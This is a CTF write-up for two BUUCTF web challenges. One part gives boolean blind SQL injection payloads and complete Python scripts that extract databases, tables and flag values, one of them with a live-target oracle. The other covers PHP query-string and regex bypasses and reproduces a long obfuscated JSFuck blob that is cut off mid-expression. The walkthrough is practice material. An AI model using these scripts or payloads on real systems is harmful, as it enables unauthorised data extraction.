BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询

[WUSTCTF2020]颜值成绩查询

Initial information

Challenge

There is only one query box on the page. The URL and the responses it gives look like this:

GET: 9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=1
return: Hi admin, your score is: 100

GET: 9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=-1
return: student number not exists.

Nothing else turned up from scanning.

Solution

Ordinary SQL injection through the ID does not work, because the parameter is checked server-side (note that none of the payloads below contain a space; parentheses are used in place of whitespace throughout).

What does this request turn into as a query inside the database?

Try querying with MySQL's IF function:

Boolean-based injection, built on if(a,b,c):
If a is true, return b
If a is false, return c

With that understanding of IF, try this request:

GET: 9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=if((1>0),1,-1)
return: Hi admin, your score is: 100

GET: 9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=if((1<0),1,-1)
return: student number not exists.

Since the boolean outcome yields two clearly distinguishable response strings, we can do boolean-based blind injection.

# Using the statement below as the base, only one spot needs to be swapped out:
# the braces mark the parts to fill in
## Part one: the URL
http://e8d02b1d-0f1f-44bd-b85e-b32fba306b48.node4.buuoj.cn:81/?stunum={}
## Part two: the statement we modify, i.e. the injected expression
## {0} is the injected sub-query, {1} is the start position of the substring, {2} is the decimal ASCII value of the character
## We only need to drop our sub-query into {0}; {1} and {2} are used by the brute force later and are left as placeholders here
## ord: converts a character to its decimal ASCII code
## substring(x,1,1): take 1 character of x starting at position 1 (MySQL positions are 1-based)
if((ord(substring({0},{1},1))={2}),1,-1)

Before writing the boolean injection, a quick word on the SQL injection workflow:

It roughly goes: database => tables => columns => column values

Personally, the blogger's habit is to pull a whole column in one go with group_concat and dump it.

Boolean injection with each sub-query inserted at {0}:

# Database name
{0} = (database())
## Combined into a full request (brute-forcing the second character of the database name here):
http://e8d02b1d-0f1f-44bd-b85e-b32fba306b48.node4.buuoj.cn:81/?stunum=if((ord(substring((database()),2,1))=97),1,-1)
## Look closely at this one and the construction of the rest follows the same pattern
## Below only the value inserted at {0} is shown
# Result of the query: the database name is ctf

# Tables
{0} = (select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))
# Table names found: 'flag,score'

# Columns (two tables, each brute-forced separately)
{0} = (select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))
{0} = (select(group_concat(column_name))from(information_schema.columns)where(table_name="score"))
# Results: ['flag,value', 'id,name,score']

# Column values (only the value column of the flag table here)
{0} = (select(group_concat(value))from(ctf.flag))
# This query returns the flag directly.

To make the brute force easier I wrote a helper script. It is not multithreaded, so it is fairly slow...

# coding=utf8
import time

import requests
# tqdm: progress-bar library
from tqdm import tqdm


## Boolean-based blind injection
def bool_cs_request(url, get_vals):
    urls = url + '?' + get_vals

    def get_status(value):
        """
        Response classifier
        :param value: the HTTP response object
        :return: True when the injected condition held
        """
        return ("student number not exists" not in value.text
                and "Hi admin, your score is: 100" in value.text)

    def get_val(value, urls):
        """
        Boolean brute-forcer
        :param value: the SQL expression to extract
        :param urls: URL template to attack
        :return: the extracted string

        Only drawback: it is slow, since it is not multithreaded
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
        }
        name_val = ''
        all_sql = 'if((ord(substring({0},{1},1))={2}),1,-1)'
        for i in range(1, 100000):
            lin_val = name_val
            for ascii_one in tqdm(charset, desc='per-character progress', unit='char'):
                val = requests.get(urls.format(all_sql.format(value, i, ascii_one)), headers=headers)
                time.sleep(0.1)
                if get_status(val):
                    name_val += chr(ascii_one)
                    print()
                    print(name_val)
                    break

            # no candidate matched at this position: end of the string
            if lin_val == name_val:
                break
        return name_val

    # Build the ASCII candidate list
    # The order is tuned so that likely characters are tried first
    def n_to_l(num_start, num_end):
        return list(range(num_start, num_end))

    l = (n_to_l(97, 123) + n_to_l(65, 91) + n_to_l(48, 58)
         + [95, 123, 125, 44, 45, 46] + n_to_l(32, 43)[::-1])
    ls = [i for i in range(32, 127) if i not in l]
    charset = l + ls[::-1]

    # Database name
    database_sql = 'database()'
    database_name = get_val(database_sql, urls)

    # print('database: ' + database_name)

    # Tables
    table_sql = "(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))"
    table_name = get_val(table_sql, urls)
    # split the table names into a list (also works when there is only one table)
    table_list = table_name.split(',') if table_name else []

    # Columns/fields
    ## the columns of each table
    l_list = []
    for name in table_list:
        l_sql = '(select(group_concat(column_name))from(information_schema.columns)where(table_name="{}"))'.format(
            name)
        l_list.append(get_val(l_sql, urls))

    ## split each table's column list
    all_field = [i.split(',') for i in l_list]

    # Dump values
    find_num = 0
    field_num = 0
    try:
        print('database:', database_name)
        print('Enter numbers only.')
        print('tables:', table_list)
        print('fields:', all_field)
        control_table = input('Which table to query (index starting at 0; only one table at a time): ').strip()
        control_field = input('Which field of that table (index starting at 0; only one field at a time): ').strip()
        find_num += int(control_table)
        field_num += int(control_field)
    except ValueError:
        find_num = 0
        field_num = 0
        print('Invalid input! Defaulting to the first table and field.')

    # Query only the chosen table and field, to avoid dumping everything
    if 0 <= find_num < len(table_list):
        if 0 <= field_num < len(all_field[find_num]):
            # build the SQL expression
            field_val = '(select(group_concat({}))from({}.{}))'.format(all_field[find_num][field_num], database_name,
                                                                       table_list[find_num])
            print(get_val(field_val, urls))
        else:
            print('You are querying a field that does not exist...')
    else:
        print('You are querying a table that does not exist...')


if __name__ == '__main__':
    # url = 'http://e8d02b1d-0f1f-44bd-b85e-b32fba306b48.node4.buuoj.cn:81/'
    url = input('Enter your URL (e.g. http://xxx.xxx.com:81/): ')
    get_parameters = 'stunum={}'
    bool_cs_request(url, get_parameters)

If you use the script, remember to install the packages it imports (requests and tqdm).

To make the process a bit more fun, I added a progress bar `(∩_∩)′

A heads-up about runtime: it will exceed the 1h lifetime of the BUUCTF instance, so be prepared to extend the instance.
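The slowness comes from trying every candidate character in turn (up to ~95 requests per position). The same oracle answers a ">" question just as well as an "=" question, so a binary search over the code point needs exactly 7 requests per character. The following is an added example, not the post's script: it keeps the write-up's payload shape, and runs offline against a constructed stand-in for the stunum endpoint (FAKE_DB and fake_server are made up for the demo). http_oracle is the live variant; the base URL it takes is assumed to have the same form as the instance URLs above and is never contacted here.

```python
import re
import urllib.parse
import urllib.request

# Same payload shape as the write-up, but with ">" instead of "=" so each
# answer halves the search range: 7 requests per character instead of up to ~95.
PAYLOAD = "if((ord(substring({expr},{pos},1))>{value}),1,-1)"
TRUE_MARK = "Hi admin, your score is: 100"

# Constructed stand-in for the target's data (assumption, for offline runs only).
FAKE_DB = {
    "database()": "ctf",
    "(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))": "flag,score",
}


def fake_server(stunum):
    """Constructed model of the stunum endpoint: understands only the payload
    shape above and answers with the two response strings seen on the page."""
    m = re.fullmatch(r"if\(\(ord\(substring\((.+),(\d+),1\)\)>(\d+)\),1,-1\)", stunum)
    if not m:
        return "student number not exists."
    s = FAKE_DB.get(m.group(1), "")
    pos, value = int(m.group(2)), int(m.group(3))
    # MySQL: substring() past the end is '' and ord('') is 0, which ends the loop below
    code = ord(s[pos - 1]) if pos <= len(s) else 0
    return TRUE_MARK if code > value else "student number not exists."


def fake_oracle(stunum):
    return TRUE_MARK in fake_server(stunum)


def http_oracle(base_url):
    """Live oracle: GET base_url?stunum=<payload>. base_url is the instance URL,
    e.g. 'http://<id>.node4.buuoj.cn:81/' (assumed form; not contacted by the demo)."""
    def ask(stunum):
        url = base_url + "?" + urllib.parse.urlencode({"stunum": stunum})
        with urllib.request.urlopen(url, timeout=10) as r:
            return TRUE_MARK in r.read().decode(errors="replace")
    return ask


def extract_char(expr, pos, ask):
    """Binary search for ord(substring(expr,pos,1)) in [0,127] using ">" questions."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(PAYLOAD.format(expr=expr, pos=pos, value=mid)):
            lo = mid + 1      # character code is above mid
        else:
            hi = mid          # character code is mid or below
    return lo


def extract(expr, ask=fake_oracle, max_len=512):
    """Extract the string value of a MySQL expression one character at a time."""
    out = []
    for pos in range(1, max_len + 1):
        code = extract_char(expr, pos, ask)
        if code == 0:         # past the end of the string
            break
        out.append(chr(code))
    return "".join(out)


def extract_counting(expr, ask=fake_oracle):
    """Same as extract(), but also returns how many requests it took."""
    n = 0

    def counted(stunum):
        nonlocal n
        n += 1
        return ask(stunum)

    return extract(expr, counted), n


if __name__ == "__main__":
    # Offline demo against the constructed data; swap in http_oracle(url) for a live instance.
    for expr in FAKE_DB:
        value, requests_made = extract_counting(expr)
        print(f"{value!r} recovered in {requests_made} requests")
```

Recovering "ctf" costs 28 requests (three characters plus the terminating ord()=0 probe, 7 each); the same alphabet scan would need roughly a hundred per character in the worst case. The terminator check relies on MySQL returning '' from substring() past the end of the string, so no separate length query is needed.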

Summary

  • SQL injection: boolean-based blind
  • MySQL's IF function
  • Python scripting

[MRCTF2020]套娃

Initial information

Very little, but the page source contains a hint:

<!--
//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
!-->

 <!DOCTYPE html>
 <html lang="en">
     <head>
         <meta charset="UTF-8">
         <title>Hello BUPTers</title>
     </head>
     <body>
         <h1>Welcome!</h1>
         <span>这只不过是个小测试区,啥都没有,还请各位多多包涵!</span>
         <span>made by crispr</span>
         <br></br>
         <br></br>
         <div>
           <img src="https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1583738587360&di=ba2d04cc2ba8603ccaab3d9673976d76&imgtype=0&src=http%3A%2F%2Fimgsrc.baidu.com%2Fforum%2Fw%3D580%2Fsign%3D64c278455f6034a829e2b889fb1249d9%2F46c3bf12c8fcc3ce3e1a38779145d688d63f20eb.jpg" style="width:1500px;height:500px;">
         </div>
     </body>
 </html>

Solution

Layer one

Extract the source for analysis:

$query = $_SERVER['QUERY_STRING'];
# PHP quirk: certain characters in a parameter name are converted to underscores
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
# preg_match('/^23333$/')  => anchored at both ends; bypass with a trailing newline, since $ also matches right before a final newline
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}

Having got around the underscore check, just pass the parameter directly:

get: ?b u p t=23333%0a
<!--
%0a is a newline, so the value is not identical to '23333' (passing the !== check) but still matches the regex
the spaces in "b u p t" are sent as %20, which the QUERY_STRING check does not catch; PHP then turns them into underscores, so the variable arrives server-side as b_u_p_t

The response after passing the parameter:
-->
return: FLAG is in secrettw.php 

On PHP's parsing of parameter names, see the freebuf article linked in the summary; newer PHP versions reportedly handle this more strictly.
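The two bypasses only make sense together with the order of operations on the server: the underscore check runs on the raw, still percent-encoded QUERY_STRING, while the regex runs on the decoded and name-normalised $_GET value. The following added example (not part of the original post) models that first layer in Python so the checks can be exercised offline. php_normalize_name implements only the two rules needed here (leading spaces dropped, then space and dot become underscore), which is an assumption about PHP's full behaviour; layer_one(strict_regex=True) shows the fix of anchoring with \z (PCRE's /D modifier). One further consequence readable straight from the source is that substr_count() is case-sensitive, so an uppercase %5F also slips past the check.

```python
import re
from urllib.parse import quote, unquote_plus

CUTE = "Y0u are So cutE!"
NEXT = "you are going to the next ~"


def query_string_check(raw_query):
    """The challenge's first check, on the raw $_SERVER['QUERY_STRING'].
    substr_count() is case-sensitive, so only a literal '_' or lowercase '%5f' is caught."""
    return raw_query.count("_") == 0 and raw_query.count("%5f") == 0


def php_normalize_name(name):
    """Subset of PHP's $_GET key normalisation (assumption: only the rules needed here):
    leading spaces are dropped, then ' ' and '.' in the name become '_'."""
    return name.lstrip(" ").replace(" ", "_").replace(".", "_")


def php_get(raw_query):
    """Decode a query string the way PHP populates $_GET: percent-decoding with
    '+' as space, then name normalisation."""
    params = {}
    for pair in raw_query.split("&"):
        if not pair:
            continue
        k, _, v = pair.partition("=")
        params[php_normalize_name(unquote_plus(k))] = unquote_plus(v)
    return params


def layer_one(raw_query, strict_regex=False):
    """Model of the first layer. strict_regex=True shows the fix: anchor with \\Z
    (PCRE \\z, or the /D modifier) so the end anchor cannot match before a trailing newline."""
    if not query_string_check(raw_query):
        return CUTE
    v = php_get(raw_query).get("b_u_p_t", "")
    # Python's '$' has the same "end, or just before a final newline" meaning as PCRE's
    pattern = r"^23333\Z" if strict_regex else r"^23333$"
    if v != "23333" and re.search(pattern, v):
        return NEXT
    return ""


def build_bypass(sep=" "):
    """Build the bypass query string: the underscores are sent as sep (a space by
    default, percent-encoded to %20) and the value carries a trailing newline."""
    name = sep.join("bupt")
    return quote(name, safe="") + "=" + quote("23333\n", safe="")


if __name__ == "__main__":
    for q in ("b_u_p_t=23333", "b%5fu%5fp%5ft=23333%0a", build_bypass(),
              "b.u.p.t=23333%0a", "b%5Fu%5Fp%5Ft=23333%0a", "b%20u%20p%20t=23333"):
        print(f"{q:32} -> {layer_one(q)!r}   strict: {layer_one(q, strict_regex=True)!r}")
```

The strict variant returns nothing for every input: once the regex can only match the exact string "23333", the `!== '23333'` condition and the regex can never both hold, which is the intended dead end.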

Layer two

Visiting secrettw.php gives:

Flag is here~But how to get it?Local access only!
Sorry,you don't have permission! Your ip is :sorry,this way is banned! 

"Local access only" means we need to find which request header the server reads the client IP from and brute-force it.

Looking through the page source again, there is one more piece of information:

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[
]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][[]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[!+[]+!+[]]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+
!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(
![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+
(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])+(![]+[])